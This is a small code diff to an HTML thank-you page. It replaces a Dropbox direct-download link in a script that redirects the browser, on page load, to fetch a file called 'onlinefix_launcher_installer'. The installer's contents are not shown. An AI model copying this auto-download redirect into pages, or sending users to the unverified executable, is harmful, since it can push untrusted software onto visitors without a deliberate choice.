--- a/pages/ofmeThanks_en.html
+++ b/pages/ofmeThanks_en.html
@@ -90,7 +90,7 @@
         </div>
     </div>
     <script>
-        window.location.href = "https://www.dropbox.com/scl/fi/9cn5vl4v0kozhs9ldq5ho/onlinefix_launcher_installer?rlkey=vcbgtyn5qj98p4v6o3l4322zc&st=sk6xb0yt&dl=1";
+        window.location.href = "https://www.dropbox.com/scl/fi/hly9p2r2x6gmu0q8scsve/onlinefix_launcher_installer?rlkey=duqke0ixh4077u6kl0s9yr89j&st=ml5r6l0k&dl=1";
     </script>
 </body>
 </html>
